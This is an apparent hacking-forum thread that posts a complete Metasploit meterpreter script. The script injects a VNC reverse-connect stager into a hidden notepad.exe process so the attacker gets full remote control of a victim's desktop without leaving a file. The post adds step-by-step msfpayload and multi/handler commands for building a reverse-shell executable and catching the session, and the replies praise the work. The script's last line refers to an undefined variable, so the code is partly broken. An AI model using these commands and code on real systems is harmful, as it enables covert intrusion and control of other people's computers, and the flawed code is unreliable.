Results 1 to 4 of 4

Thread: vnc memory injection with meterpreter

  1. #1
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010
    Posts
    660

    Post vnc memory injection with meterpreter

    Description:
    A script that utilizes memory injection to get a VNC session without losing your meterpreter session.

    I spent quite a bit of time trying to get vnc_oneport.rb working. Then finally decided that vnc.rb worked great except 1 thing. It created a file on the victims machine and you would have to manually delete it later. So I utilized the cool execution and injection feature that was in vnc_oneport.rb and ported it into vnc.rb.

    This is sort of a work in progress but I'll share what I've done so far to get it working. It's not as hard as it looks as long as you know how to get a meterpreter session.

    First we need to traverse to the directory that we will be putting our script into.

    Open a shell and type:
    Code:
    cd /pentest/exploits/framework3/scripts/meterpreter/
    Use whatever editor your most comfortable with here but keep the name the same.
    Code:
    nano vnc_mem.rb
    Now copy this:
    Code:
    # $Id: vnc_mem.rb 12-17-2009 hdm $
    
    #
    # Meterpreter script for obtaining a quick VNC session
    # Hybrid of vnc.rb and vnc_oneport.rb
    # Utilizes memory functions so no file is created
    # Known Issue: spawns metasploit courtesy shell on vnc server side (victim)
    # You can exit out of courtesy shell easily once you obtain a vnc session
    # All code written by H.D. Moore (hdm)
    # Edited by hhmatt
    #
    
    session = client
    
    #
    # Options
    #
    opts = Rex::Parser::Arguments.new(
            "-h"  => [ false,  "This help menu"],
            "-r"  => [ true,   "The IP of the system running Metasploit listening for the connect back"],
            "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4545)"],
    #       "-D"  => [ false,  "Disable the automatic multi/handler (use with -r to accept on another system)"],
            "-e"  => [ true,    "The process to run and inject into (default: notepad.exe)"]
    )
    
    #
    # Default parameters
    #
    
    runme    = "notepad.exe"
    rhost    = Rex::Socket.source_address("1.2.3.4")
    rport    = 4545
    #autoconn = true
    
    #
    # Option parsing
    #
    opts.parse(args) do |opt, idx, val|
            case opt
            when "-h"
                    print_line(opts.usage)
                    return
            when "-r"
                    rhost = val
            when "-p"
                    rport = val.to_i
    #       when "-D"
    #               autoconn = false
            when "-e"
                    runme = val
            end
    end
    
    #
    # Create the agent EXE
    #
    print_status("Creating a VNC stager: LHOST=#{rhost} LPORT=#{rport})")
    pay = client.framework.payloads.create("windows/vncinject/reverse_tcp")
    pay.datastore['LHOST'] = rhost
    pay.datastore['LPORT'] = rport
    raw  = pay.generate
    
    exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
    print_status("VNC stager executable #{exe.length} bytes long")
    
    
    #
    # Create a host process
    #
    pid = client.sys.process.execute("#{runme}", nil, {'Hidden' => 'true'}).pid
    print_status("Host process #{runme} has PID #{pid}")
    note = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
    mem  = note.memory.allocate(1024*32)
    
    print_status("Allocated memory at address #{"0x%.8x" % mem}")
    print_status("Writing the VNC stager into memory...")
    note.memory.write(mem, raw)
    
    
    #
    # Setup the multi/handler
    #
    
            mul = client.framework.exploits.create("multi/handler")
            mul.datastore['PAYLOAD']   = "windows/vncinject/reverse_tcp"
            mul.datastore['LHOST']     = rhost
            mul.datastore['LPORT']     = rport
            mul.datastore['EXITFUNC']  = 'process'
            mul.datastore['ExitOnSession'] = true
    
            mul.exploit_simple(
                    'Payload'        => mul.datastore['PAYLOAD'],
                    'RunAsJob'       => true)
    
    #
    # Execute the agent
    #
    print_status("Creating a new thread within #{runme} to run the VNC stager...")
    note.thread.create(mem, 0)
    
    
    print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...")
    proc = session.sys.process.execute(tempexe, nil, {'Hidden' => true})
    And paste it into your editor.

    Then you can save and exit:
    Code:
    Ctrl+o (the letter not the number zero)
    
    Ctrl+x
    Nothing more needs to be done, it will automatically load the script once metasploit starts.
    So lets start Metasploit!
    Code:
    /pentest/exploits/framework3/./msfconsole
    I'm using the reverse tcp metasploit connection from a executable payload. You can use whatever method you know or have to give you a meterpreter session.

    Ok so let's get our meterpreter session started.
    Code:
    msf > use multi/handler
    
    msf(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    
    msf(handler) > show options
    At this point you will need to set LHOST and RPORT (remember to change these to match your network and port).
    LHOST is your attacker machine and LPORT is your port to listen on.
    Code:
    msf(handler) > set LHOST 192.168.1.100
    
    msf(handler) > set LPORT 81
    OK. Let's start our listener now.
    Code:
    msf(handler) > exploit
    At this point you should see something like this:
    Code:
    [*] Starting the payload handler...
    [*] Started Reverse Handler on port 81
    Now we need to run our executable on the victim machine to give us a meterpreter session.
    This is how I made my exe.
    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=81 X > /tmp/meter.exe
    This is what you should get at the end:
    Code:
    meterpreter >
    This is a good point to make sure your connected to the right machine.
    Code:
    meterpreter > ipconfig
    meterpreter > getuid
    If you need to know some of the main basic commands that meterpreter uses just type in a ? like this.
    Code:
    meterpreter > ?
    OK, now to see if our script is recognized.
    Code:
    meterpreter > run vnc_mem.rb -h
    This should post the scripts help options.
    Here's what I get:
    Code:
    OPTIONS:
    
        -e <opt>  The process to run and inject into (default: notepad.exe)
        -h        This help menu
        -p <opt>  The port on the remote host where Metasploit is listening (default: 4545)
        -r <opt>  The IP of the system running Metasploit listening for the connect back
    Looks good lets give it a run:
    Code:
    meterpreter > run vnc_mem.rb
    Success!
    At this point you should've recieved a new window open in tightvnc with your victims desktop and full control!
    You can also check back on meterpreter and see that you still have an active session. Sometimes you have to hit enter once or twice to see the prompt.

    Hope you get some useful information from this and happy hacking!

  2. #2
    Junior Member cRaZylilmuffin's Avatar
    Join Date
    Mar 2010
    Posts
    38

    Default

    cool ill have to try it out
    "Things are not what they appear to be: nor are they otherwise." -Surangama Sutra

  3. #3
    Good friend of the forums
    Join Date
    Feb 2009
    Posts
    356

    Default

    great work dude! Nice merge between the rb's

  4. #4
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010
    Posts
    660

    Default

    Thanks, I'm glad you liked it.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •